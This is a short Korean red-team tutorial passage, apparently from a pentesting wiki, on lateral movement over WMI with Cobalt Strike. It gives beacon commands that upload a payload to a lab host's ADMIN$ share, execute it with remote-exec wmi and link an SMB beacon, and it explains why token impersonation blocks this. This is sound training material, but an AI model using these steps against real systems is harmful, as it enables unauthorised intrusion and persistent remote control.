WMI

WMI를 통한 측면이동 방법으로는 타켓 시스템의 폴더에 페이로드를 업로드 한 뒤, WMI를 사용하여 실행하는 것입니다. 예를 들어 Wiki 사용자가 Pentest 사용자의 공유 폴더에 접근할 수 있고 이곳에 쓰기 권한이 있다고 했을 때 Wiki 사용자는 해당 공유 폴더에 페이로드를 업로드 할 수 있습니다. 그리고 코발트 스트라이크에서 제공하는 remote-exec 도구를 사용하여 WMI를 통한 원격 명령으로 해당 파일을 실행하면 비콘이 연결되는 것을 확인할 수 있습니다.

다만 비콘 콘솔에서 이미 다른 사용자의 토큰 등을 사용하여 가장한 상태라면 WMI를 통해 원격 파일 실행을 할 수 없습니다. 이러한 이유는 비콘에서 WMI를 통해 원격 명령을 실행할 땐 Beacon Object File을 사용하는데, 이는 ColnitialzeSecurity COM 객체를 호출하게 됩니다. 이 객체는 현재 프로세스의 보안 컨텍스트를 설정하는데 사용되지만 프로세스 당 1회만 사용할 수 있습니다. 따라서 Wiki 사용자의 컨텍스트에서 ColnitializeSecurity가 호출되면 이후의 BOF들은 해당 객체를 호출하지 못하여 WMI 사용이 거부됩니다.

# 대상 공유 폴더로 이동 및 페이로드 업로드
beacon> cd \\web.dev.pentesting.wiki\ADMIN$
beacon> upload C:\Payloads\smb_x64.exe

# 원격 명령 실행을 통해 공유 폴더 내 페이로드 실행
remote-exec wmi web.dev.pentesting.wiki C:\Windows\smb_x64.exe

# 타겟 시스템에서 열린 파이프에 접근하여 비콘 연결
link web.dev.pentesting.wiki <SMB Pipename>

여기서 SMB Pipe 이름은 SMB 리스너를 생성할 때 Pipename으로 설정한 값입니다.